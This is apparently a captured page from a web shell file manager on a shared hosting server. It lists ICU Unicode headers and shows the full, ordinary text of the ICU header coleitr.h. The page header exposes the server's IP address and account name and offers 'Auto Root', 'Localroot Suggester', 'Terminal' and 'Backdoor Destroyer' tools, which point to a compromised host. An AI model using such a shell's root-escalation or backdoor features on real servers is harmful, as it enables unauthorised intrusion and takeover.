Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.75
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
alt-nodejs20 /
root /
usr /
include /
unicode /
Delete
Unzip
Name
Size
Permission
Date
Action
alphaindex.h
26.54
KB
-rw-r--r--
2025-06-05 10:48
appendable.h
8.54
KB
-rw-r--r--
2025-06-05 10:48
basictz.h
9.99
KB
-rw-r--r--
2025-06-05 10:48
brkiter.h
27.84
KB
-rw-r--r--
2025-06-05 10:48
bytestream.h
10.77
KB
-rw-r--r--
2025-06-05 10:48
bytestrie.h
20.83
KB
-rw-r--r--
2025-06-05 10:48
bytestriebuilder.h
7.48
KB
-rw-r--r--
2025-06-05 10:48
calendar.h
107.83
KB
-rw-r--r--
2025-06-05 10:48
caniter.h
7.53
KB
-rw-r--r--
2025-06-05 10:48
casemap.h
25.42
KB
-rw-r--r--
2025-06-05 10:48
char16ptr.h
9.22
KB
-rw-r--r--
2025-06-05 10:48
chariter.h
23.79
KB
-rw-r--r--
2025-06-05 10:48
choicfmt.h
23.99
KB
-rw-r--r--
2025-06-05 10:48
coleitr.h
13.78
KB
-rw-r--r--
2025-06-05 10:48
coll.h
59.6
KB
-rw-r--r--
2025-06-05 10:48
compactdecimalformat.h
6.88
KB
-rw-r--r--
2025-06-05 10:48
curramt.h
3.67
KB
-rw-r--r--
2025-06-05 10:48
currpinf.h
7.3
KB
-rw-r--r--
2025-06-05 10:48
currunit.h
4.02
KB
-rw-r--r--
2025-06-05 10:48
datefmt.h
40.7
KB
-rw-r--r--
2025-06-05 10:48
dbbi.h
1.19
KB
-rw-r--r--
2025-06-05 10:48
dcfmtsym.h
20.95
KB
-rw-r--r--
2025-06-05 10:48
decimfmt.h
87.46
KB
-rw-r--r--
2025-06-05 10:48
displayoptions.h
7.08
KB
-rw-r--r--
2025-06-05 10:48
docmain.h
7.6
KB
-rw-r--r--
2025-06-05 10:48
dtfmtsym.h
38.21
KB
-rw-r--r--
2025-06-05 10:48
dtintrv.h
3.84
KB
-rw-r--r--
2025-06-05 10:48
dtitvfmt.h
48.87
KB
-rw-r--r--
2025-06-05 10:48
dtitvinf.h
18.63
KB
-rw-r--r--
2025-06-05 10:48
dtptngen.h
28.05
KB
-rw-r--r--
2025-06-05 10:48
dtrule.h
8.66
KB
-rw-r--r--
2025-06-05 10:48
edits.h
20.74
KB
-rw-r--r--
2025-06-05 10:48
enumset.h
2.08
KB
-rw-r--r--
2025-06-05 10:48
errorcode.h
4.84
KB
-rw-r--r--
2025-06-05 10:48
fieldpos.h
8.69
KB
-rw-r--r--
2025-06-05 10:48
filteredbrk.h
5.37
KB
-rw-r--r--
2025-06-05 10:48
fmtable.h
24.37
KB
-rw-r--r--
2025-06-05 10:48
format.h
12.5
KB
-rw-r--r--
2025-06-05 10:48
formattednumber.h
6.28
KB
-rw-r--r--
2025-06-05 10:48
formattedvalue.h
9.75
KB
-rw-r--r--
2025-06-05 10:48
fpositer.h
3.03
KB
-rw-r--r--
2025-06-05 10:48
gender.h
3.35
KB
-rw-r--r--
2025-06-05 10:48
gregocal.h
30.3
KB
-rw-r--r--
2025-06-05 10:48
icudataver.h
1.02
KB
-rw-r--r--
2025-06-05 10:48
icuplug.h
12.1
KB
-rw-r--r--
2025-06-05 10:48
idna.h
12.93
KB
-rw-r--r--
2025-06-05 10:48
listformatter.h
8.59
KB
-rw-r--r--
2025-06-05 10:48
localebuilder.h
11.08
KB
-rw-r--r--
2025-06-05 10:48
localematcher.h
26.86
KB
-rw-r--r--
2025-06-05 10:48
localpointer.h
19.55
KB
-rw-r--r--
2025-06-05 10:48
locdspnm.h
7.12
KB
-rw-r--r--
2025-06-05 10:48
locid.h
48.4
KB
-rw-r--r--
2025-06-05 10:48
measfmt.h
11.41
KB
-rw-r--r--
2025-06-05 10:48
measunit.h
109.16
KB
-rw-r--r--
2025-06-05 10:48
measure.h
4.63
KB
-rw-r--r--
2025-06-05 10:48
messageformat2.h
21.01
KB
-rw-r--r--
2025-06-05 10:48
messageformat2_arguments.h
4.31
KB
-rw-r--r--
2025-06-05 10:48
messageformat2_data_model.h
101.85
KB
-rw-r--r--
2025-06-05 10:48
messageformat2_data_model_names.h
784
B
-rw-r--r--
2025-06-05 10:48
messageformat2_formattable.h
38.29
KB
-rw-r--r--
2025-06-05 10:48
messageformat2_function_registry.h
18
KB
-rw-r--r--
2025-06-05 10:48
messagepattern.h
33.79
KB
-rw-r--r--
2025-06-05 10:48
msgfmt.h
44.2
KB
-rw-r--r--
2025-06-05 10:48
normalizer2.h
34.68
KB
-rw-r--r--
2025-06-05 10:48
normlzr.h
30.79
KB
-rw-r--r--
2025-06-05 10:48
nounit.h
2.24
KB
-rw-r--r--
2025-06-05 10:48
numberformatter.h
90.74
KB
-rw-r--r--
2025-06-05 10:48
numberrangeformatter.h
26.05
KB
-rw-r--r--
2025-06-05 10:48
numfmt.h
50.16
KB
-rw-r--r--
2025-06-05 10:48
numsys.h
7.22
KB
-rw-r--r--
2025-06-05 10:48
parseerr.h
3.08
KB
-rw-r--r--
2025-06-05 10:48
parsepos.h
5.56
KB
-rw-r--r--
2025-06-05 10:48
platform.h
27.18
KB
-rw-r--r--
2025-06-05 10:48
plurfmt.h
25.07
KB
-rw-r--r--
2025-06-05 10:48
plurrule.h
20.63
KB
-rw-r--r--
2025-06-05 10:48
ptypes.h
2.16
KB
-rw-r--r--
2025-06-05 10:48
putil.h
6.32
KB
-rw-r--r--
2025-06-05 10:48
rbbi.h
32.04
KB
-rw-r--r--
2025-06-05 10:48
rbnf.h
50.53
KB
-rw-r--r--
2025-06-05 10:48
rbtz.h
15.75
KB
-rw-r--r--
2025-06-05 10:48
regex.h
84.45
KB
-rw-r--r--
2025-06-05 10:48
region.h
9.2
KB
-rw-r--r--
2025-06-05 10:48
reldatefmt.h
22.48
KB
-rw-r--r--
2025-06-05 10:48
rep.h
9.38
KB
-rw-r--r--
2025-06-05 10:48
resbund.h
18.03
KB
-rw-r--r--
2025-06-05 10:48
schriter.h
6.09
KB
-rw-r--r--
2025-06-05 10:48
scientificnumberformatter.h
6.44
KB
-rw-r--r--
2025-06-05 10:48
search.h
22.21
KB
-rw-r--r--
2025-06-05 10:48
selfmt.h
14.35
KB
-rw-r--r--
2025-06-05 10:48
simpleformatter.h
12.6
KB
-rw-r--r--
2025-06-05 10:48
simplenumberformatter.h
8.92
KB
-rw-r--r--
2025-06-05 10:48
simpletz.h
45.62
KB
-rw-r--r--
2025-06-05 10:48
smpdtfmt.h
57.06
KB
-rw-r--r--
2025-06-05 10:48
sortkey.h
11.13
KB
-rw-r--r--
2025-06-05 10:48
std_string.h
1.05
KB
-rw-r--r--
2025-06-05 10:48
strenum.h
9.96
KB
-rw-r--r--
2025-06-05 10:48
stringoptions.h
5.79
KB
-rw-r--r--
2025-06-05 10:48
stringpiece.h
10.28
KB
-rw-r--r--
2025-06-05 10:48
stringtriebuilder.h
15.53
KB
-rw-r--r--
2025-06-05 10:48
stsearch.h
21.43
KB
-rw-r--r--
2025-06-05 10:48
symtable.h
4.28
KB
-rw-r--r--
2025-06-05 10:48
tblcoll.h
36.96
KB
-rw-r--r--
2025-06-05 10:48
timezone.h
45.59
KB
-rw-r--r--
2025-06-05 10:48
tmunit.h
3.4
KB
-rw-r--r--
2025-06-05 10:48
tmutamt.h
4.9
KB
-rw-r--r--
2025-06-05 10:48
tmutfmt.h
7.42
KB
-rw-r--r--
2025-06-05 10:48
translit.h
65.81
KB
-rw-r--r--
2025-06-05 10:48
tzfmt.h
42.95
KB
-rw-r--r--
2025-06-05 10:48
tznames.h
16.85
KB
-rw-r--r--
2025-06-05 10:48
tzrule.h
34.81
KB
-rw-r--r--
2025-06-05 10:48
tztrans.h
6.11
KB
-rw-r--r--
2025-06-05 10:48
ubidi.h
89.61
KB
-rw-r--r--
2025-06-05 10:48
ubiditransform.h
12.71
KB
-rw-r--r--
2025-06-05 10:48
ubrk.h
24.43
KB
-rw-r--r--
2025-06-05 10:48
ucal.h
63.96
KB
-rw-r--r--
2025-06-05 10:48
ucasemap.h
15.27
KB
-rw-r--r--
2025-06-05 10:48
ucat.h
5.35
KB
-rw-r--r--
2025-06-05 10:48
uchar.h
151.87
KB
-rw-r--r--
2025-06-05 10:48
ucharstrie.h
22.59
KB
-rw-r--r--
2025-06-05 10:48
ucharstriebuilder.h
7.48
KB
-rw-r--r--
2025-06-05 10:48
uchriter.h
13.24
KB
-rw-r--r--
2025-06-05 10:48
uclean.h
11.21
KB
-rw-r--r--
2025-06-05 10:48
ucnv.h
83.34
KB
-rw-r--r--
2025-06-05 10:48
ucnv_cb.h
6.58
KB
-rw-r--r--
2025-06-05 10:48
ucnv_err.h
20.98
KB
-rw-r--r--
2025-06-05 10:48
ucnvsel.h
6.24
KB
-rw-r--r--
2025-06-05 10:48
ucol.h
66.28
KB
-rw-r--r--
2025-06-05 10:48
ucoleitr.h
9.82
KB
-rw-r--r--
2025-06-05 10:48
uconfig.h
12.56
KB
-rw-r--r--
2025-06-05 10:48
ucpmap.h
5.54
KB
-rw-r--r--
2025-06-05 10:48
ucptrie.h
22.51
KB
-rw-r--r--
2025-06-05 10:48
ucsdet.h
14.69
KB
-rw-r--r--
2025-06-05 10:48
ucurr.h
16.72
KB
-rw-r--r--
2025-06-05 10:48
udat.h
62.36
KB
-rw-r--r--
2025-06-05 10:48
udata.h
15.63
KB
-rw-r--r--
2025-06-05 10:48
udateintervalformat.h
11.93
KB
-rw-r--r--
2025-06-05 10:48
udatpg.h
30.13
KB
-rw-r--r--
2025-06-05 10:48
udisplaycontext.h
5.94
KB
-rw-r--r--
2025-06-05 10:48
udisplayoptions.h
8.86
KB
-rw-r--r--
2025-06-05 10:48
uenum.h
7.79
KB
-rw-r--r--
2025-06-05 10:48
ufieldpositer.h
4.41
KB
-rw-r--r--
2025-06-05 10:48
uformattable.h
10.97
KB
-rw-r--r--
2025-06-05 10:48
uformattednumber.h
8.09
KB
-rw-r--r--
2025-06-05 10:48
uformattedvalue.h
12.25
KB
-rw-r--r--
2025-06-05 10:48
ugender.h
2.06
KB
-rw-r--r--
2025-06-05 10:48
uidna.h
34.12
KB
-rw-r--r--
2025-06-05 10:48
uiter.h
22.75
KB
-rw-r--r--
2025-06-05 10:48
uldnames.h
10.48
KB
-rw-r--r--
2025-06-05 10:48
ulistformatter.h
10.78
KB
-rw-r--r--
2025-06-05 10:48
uloc.h
55.38
KB
-rw-r--r--
2025-06-05 10:48
ulocale.h
6.31
KB
-rw-r--r--
2025-06-05 10:48
ulocbuilder.h
16.69
KB
-rw-r--r--
2025-06-05 10:48
ulocdata.h
11.3
KB
-rw-r--r--
2025-06-05 10:48
umachine.h
14.59
KB
-rw-r--r--
2025-06-05 10:48
umisc.h
1.34
KB
-rw-r--r--
2025-06-05 10:48
umsg.h
24.25
KB
-rw-r--r--
2025-06-05 10:48
umutablecptrie.h
8.3
KB
-rw-r--r--
2025-06-05 10:48
unifilt.h
4
KB
-rw-r--r--
2025-06-05 10:48
unifunct.h
4.05
KB
-rw-r--r--
2025-06-05 10:48
unimatch.h
6.1
KB
-rw-r--r--
2025-06-05 10:48
unirepl.h
3.38
KB
-rw-r--r--
2025-06-05 10:48
uniset.h
70.31
KB
-rw-r--r--
2025-06-05 10:48
unistr.h
182.08
KB
-rw-r--r--
2025-06-05 10:48
unorm.h
20.55
KB
-rw-r--r--
2025-06-05 10:48
unorm2.h
25.66
KB
-rw-r--r--
2025-06-05 10:48
unum.h
55.16
KB
-rw-r--r--
2025-06-05 10:48
unumberformatter.h
19.68
KB
-rw-r--r--
2025-06-05 10:48
unumberoptions.h
5.23
KB
-rw-r--r--
2025-06-05 10:48
unumberrangeformatter.h
15.35
KB
-rw-r--r--
2025-06-05 10:48
unumsys.h
7.26
KB
-rw-r--r--
2025-06-05 10:48
uobject.h
10.66
KB
-rw-r--r--
2025-06-05 10:48
upluralrules.h
8.79
KB
-rw-r--r--
2025-06-05 10:48
uregex.h
71.99
KB
-rw-r--r--
2025-06-05 10:48
uregion.h
9.81
KB
-rw-r--r--
2025-06-05 10:48
ureldatefmt.h
16.98
KB
-rw-r--r--
2025-06-05 10:48
urename.h
141.99
KB
-rw-r--r--
2025-06-05 10:48
urep.h
5.38
KB
-rw-r--r--
2025-06-05 10:48
ures.h
36.65
KB
-rw-r--r--
2025-06-05 10:48
uscript.h
28.51
KB
-rw-r--r--
2025-06-05 10:48
usearch.h
39.21
KB
-rw-r--r--
2025-06-05 10:48
uset.h
62.57
KB
-rw-r--r--
2025-06-05 10:48
usetiter.h
9.63
KB
-rw-r--r--
2025-06-05 10:48
ushape.h
18
KB
-rw-r--r--
2025-06-05 10:48
usimplenumberformatter.h
7.36
KB
-rw-r--r--
2025-06-05 10:48
uspoof.h
80
KB
-rw-r--r--
2025-06-05 10:48
usprep.h
8.19
KB
-rw-r--r--
2025-06-05 10:48
ustdio.h
38.56
KB
-rw-r--r--
2025-06-05 10:48
ustream.h
1.89
KB
-rw-r--r--
2025-06-05 10:48
ustring.h
72.16
KB
-rw-r--r--
2025-06-05 10:48
ustringtrie.h
3.15
KB
-rw-r--r--
2025-06-05 10:48
utext.h
58.1
KB
-rw-r--r--
2025-06-05 10:48
utf.h
7.87
KB
-rw-r--r--
2025-06-05 10:48
utf16.h
23.35
KB
-rw-r--r--
2025-06-05 10:48
utf32.h
763
B
-rw-r--r--
2025-06-05 10:48
utf8.h
30.83
KB
-rw-r--r--
2025-06-05 10:48
utf_old.h
45.8
KB
-rw-r--r--
2025-06-05 10:48
utmscale.h
13.78
KB
-rw-r--r--
2025-06-05 10:48
utrace.h
17.18
KB
-rw-r--r--
2025-06-05 10:48
utrans.h
25.54
KB
-rw-r--r--
2025-06-05 10:48
utypes.h
34.27
KB
-rw-r--r--
2025-06-05 10:48
uvernum.h
6.33
KB
-rw-r--r--
2025-06-05 10:48
uversion.h
7.58
KB
-rw-r--r--
2025-06-05 10:48
vtzone.h
20.68
KB
-rw-r--r--
2025-06-05 10:48
Save
Rename
// © 2016 and later: Unicode, Inc. and others. // License & terms of use: http://www.unicode.org/copyright.html /* ****************************************************************************** * Copyright (C) 1997-2014, International Business Machines * Corporation and others. All Rights Reserved. ****************************************************************************** */ /** * \file * \brief C++ API: Collation Element Iterator. */ /** * File coleitr.h * * Created by: Helena Shih * * Modification History: * * Date Name Description * * 8/18/97 helena Added internal API documentation. * 08/03/98 erm Synched with 1.2 version CollationElementIterator.java * 12/10/99 aliu Ported Thai collation support from Java. * 01/25/01 swquek Modified into a C++ wrapper calling C APIs (ucoliter.h) * 02/19/01 swquek Removed CollationElementsIterator() since it is * private constructor and no calls are made to it * 2012-2014 markus Rewritten in C++ again. */ #ifndef COLEITR_H #define COLEITR_H #include "unicode/utypes.h" #if U_SHOW_CPLUSPLUS_API #if !UCONFIG_NO_COLLATION #include "unicode/unistr.h" #include "unicode/uobject.h" struct UCollationElements; struct UHashtable; U_NAMESPACE_BEGIN struct CollationData; class CharacterIterator; class CollationIterator; class RuleBasedCollator; class UCollationPCE; class UVector32; /** * The CollationElementIterator class is used as an iterator to walk through * each character of an international string. Use the iterator to return the * ordering priority of the positioned character. The ordering priority of a * character, which we refer to as a key, defines how a character is collated in * the given collation object. * For example, consider the following in Slovak and in traditional Spanish collation: * <pre> * "ca" -> the first key is key('c') and second key is key('a'). * "cha" -> the first key is key('ch') and second key is key('a').</pre> * And in German phonebook collation, * <pre> \htmlonly "æb"-> the first key is key('a'), the second key is key('e'), and * the third key is key('b'). \endhtmlonly </pre> * The key of a character, is an integer composed of primary order(short), * secondary order(char), and tertiary order(char). Java strictly defines the * size and signedness of its primitive data types. Therefore, the static * functions primaryOrder(), secondaryOrder(), and tertiaryOrder() return * int32_t to ensure the correctness of the key value. * <p>Example of the iterator usage: (without error checking) * <pre> * \code * void CollationElementIterator_Example() * { * UnicodeString str = "This is a test"; * UErrorCode success = U_ZERO_ERROR; * RuleBasedCollator* rbc = * (RuleBasedCollator*) RuleBasedCollator::createInstance(success); * CollationElementIterator* c = * rbc->createCollationElementIterator( str ); * int32_t order = c->next(success); * c->reset(); * order = c->previous(success); * delete c; * delete rbc; * } * \endcode * </pre> * <p> * The method next() returns the collation order of the next character based on * the comparison level of the collator. The method previous() returns the * collation order of the previous character based on the comparison level of * the collator. The Collation Element Iterator moves only in one direction * between calls to reset(), setOffset(), or setText(). That is, next() * and previous() can not be inter-used. Whenever previous() is to be called after * next() or vice versa, reset(), setOffset() or setText() has to be called first * to reset the status, shifting pointers to either the end or the start of * the string (reset() or setText()), or the specified position (setOffset()). * Hence at the next call of next() or previous(), the first or last collation order, * or collation order at the specified position will be returned. If a change of * direction is done without one of these calls, the result is undefined. * <p> * The result of a forward iterate (next()) and reversed result of the backward * iterate (previous()) on the same string are equivalent, if collation orders * with the value 0 are ignored. * Character based on the comparison level of the collator. A collation order * consists of primary order, secondary order and tertiary order. The data * type of the collation order is <strong>int32_t</strong>. * * Note, CollationElementIterator should not be subclassed. * @see Collator * @see RuleBasedCollator * @version 1.8 Jan 16 2001 */ class U_I18N_API CollationElementIterator final : public UObject { public: // CollationElementIterator public data member ------------------------------ enum { /** * NULLORDER indicates that an error has occurred while processing * @stable ICU 2.0 */ NULLORDER = static_cast<int32_t>(0xffffffff) }; // CollationElementIterator public constructor/destructor ------------------- /** * Copy constructor. * * @param other the object to be copied from * @stable ICU 2.0 */ CollationElementIterator(const CollationElementIterator& other); /** * Destructor * @stable ICU 2.0 */ virtual ~CollationElementIterator(); // CollationElementIterator public methods ---------------------------------- /** * Returns true if "other" is the same as "this" * * @param other the object to be compared * @return true if "other" is the same as "this" * @stable ICU 2.0 */ bool operator==(const CollationElementIterator& other) const; /** * Returns true if "other" is not the same as "this". * * @param other the object to be compared * @return true if "other" is not the same as "this" * @stable ICU 2.0 */ bool operator!=(const CollationElementIterator& other) const; /** * Resets the cursor to the beginning of the string. * @stable ICU 2.0 */ void reset(); /** * Gets the ordering priority of the next character in the string. * @param status the error code status. * @return the next character's ordering. otherwise returns NULLORDER if an * error has occurred or if the end of string has been reached * @stable ICU 2.0 */ int32_t next(UErrorCode& status); /** * Get the ordering priority of the previous collation element in the string. * @param status the error code status. * @return the previous element's ordering. otherwise returns NULLORDER if an * error has occurred or if the start of string has been reached * @stable ICU 2.0 */ int32_t previous(UErrorCode& status); /** * Gets the primary order of a collation order. * @param order the collation order * @return the primary order of a collation order. * @stable ICU 2.0 */ static inline int32_t primaryOrder(int32_t order); /** * Gets the secondary order of a collation order. * @param order the collation order * @return the secondary order of a collation order. * @stable ICU 2.0 */ static inline int32_t secondaryOrder(int32_t order); /** * Gets the tertiary order of a collation order. * @param order the collation order * @return the tertiary order of a collation order. * @stable ICU 2.0 */ static inline int32_t tertiaryOrder(int32_t order); /** * Return the maximum length of any expansion sequences that end with the * specified comparison order. * @param order a collation order returned by previous or next. * @return maximum size of the expansion sequences ending with the collation * element or 1 if collation element does not occur at the end of any * expansion sequence * @stable ICU 2.0 */ int32_t getMaxExpansion(int32_t order) const; /** * Gets the comparison order in the desired strength. Ignore the other * differences. * @param order The order value * @stable ICU 2.0 */ int32_t strengthOrder(int32_t order) const; /** * Sets the source string. * @param str the source string. * @param status the error code status. * @stable ICU 2.0 */ void setText(const UnicodeString& str, UErrorCode& status); /** * Sets the source string. * @param str the source character iterator. * @param status the error code status. * @stable ICU 2.0 */ void setText(CharacterIterator& str, UErrorCode& status); /** * Checks if a comparison order is ignorable. * @param order the collation order. * @return true if a character is ignorable, false otherwise. * @stable ICU 2.0 */ static inline UBool isIgnorable(int32_t order); /** * Gets the offset of the currently processed character in the source string. * @return the offset of the character. * @stable ICU 2.0 */ int32_t getOffset() const; /** * Sets the offset of the currently processed character in the source string. * @param newOffset the new offset. * @param status the error code status. * @return the offset of the character. * @stable ICU 2.0 */ void setOffset(int32_t newOffset, UErrorCode& status); /** * ICU "poor man's RTTI", returns a UClassID for the actual class. * * @stable ICU 2.2 */ virtual UClassID getDynamicClassID() const override; /** * ICU "poor man's RTTI", returns a UClassID for this class. * * @stable ICU 2.2 */ static UClassID U_EXPORT2 getStaticClassID(); #ifndef U_HIDE_INTERNAL_API /** @internal */ static inline CollationElementIterator *fromUCollationElements(UCollationElements *uc) { return reinterpret_cast<CollationElementIterator *>(uc); } /** @internal */ static inline const CollationElementIterator *fromUCollationElements(const UCollationElements *uc) { return reinterpret_cast<const CollationElementIterator *>(uc); } /** @internal */ inline UCollationElements *toUCollationElements() { return reinterpret_cast<UCollationElements *>(this); } /** @internal */ inline const UCollationElements *toUCollationElements() const { return reinterpret_cast<const UCollationElements *>(this); } #endif // U_HIDE_INTERNAL_API private: friend class RuleBasedCollator; friend class UCollationPCE; /** * CollationElementIterator constructor. This takes the source string and the * collation object. The cursor will walk thru the source string based on the * predefined collation rules. If the source string is empty, NULLORDER will * be returned on the calls to next(). * @param sourceText the source string. * @param order the collation object. * @param status the error code status. */ CollationElementIterator(const UnicodeString& sourceText, const RuleBasedCollator* order, UErrorCode& status); // Note: The constructors should take settings & tailoring, not a collator, // to avoid circular dependencies. // However, for operator==() we would need to be able to compare tailoring data for equality // without making CollationData or CollationTailoring depend on TailoredSet. // (See the implementation of RuleBasedCollator::operator==().) // That might require creating an intermediate class that would be used // by both CollationElementIterator and RuleBasedCollator // but only contain the part of RBC== related to data and rules. /** * CollationElementIterator constructor. This takes the source string and the * collation object. The cursor will walk thru the source string based on the * predefined collation rules. If the source string is empty, NULLORDER will * be returned on the calls to next(). * @param sourceText the source string. * @param order the collation object. * @param status the error code status. */ CollationElementIterator(const CharacterIterator& sourceText, const RuleBasedCollator* order, UErrorCode& status); /** * Assignment operator * * @param other the object to be copied */ const CollationElementIterator& operator=(const CollationElementIterator& other); CollationElementIterator() = delete; // default constructor not implemented /** Normalizes dir_=1 (just after setOffset()) to dir_=0 (just after reset()). */ inline int8_t normalizeDir() const { return dir_ == 1 ? 0 : dir_; } static UHashtable *computeMaxExpansions(const CollationData *data, UErrorCode &errorCode); static int32_t getMaxExpansion(const UHashtable *maxExpansions, int32_t order); // CollationElementIterator private data members ---------------------------- CollationIterator *iter_; // owned const RuleBasedCollator *rbc_; // aliased uint32_t otherHalf_; /** * <0: backwards; 0: just after reset() (previous() begins from end); * 1: just after setOffset(); >1: forward */ int8_t dir_; /** * Stores offsets from expansions and from unsafe-backwards iteration, * so that getOffset() returns intermediate offsets for the CEs * that are consistent with forward iteration. */ UVector32 *offsets_; UnicodeString string_; }; // CollationElementIterator inline method definitions -------------------------- inline int32_t CollationElementIterator::primaryOrder(int32_t order) { return (order >> 16) & 0xffff; } inline int32_t CollationElementIterator::secondaryOrder(int32_t order) { return (order >> 8) & 0xff; } inline int32_t CollationElementIterator::tertiaryOrder(int32_t order) { return order & 0xff; } inline UBool CollationElementIterator::isIgnorable(int32_t order) { return (order & 0xffff0000) == 0; } U_NAMESPACE_END #endif /* #if !UCONFIG_NO_COLLATION */ #endif /* U_SHOW_CPLUSPLUS_API */ #endif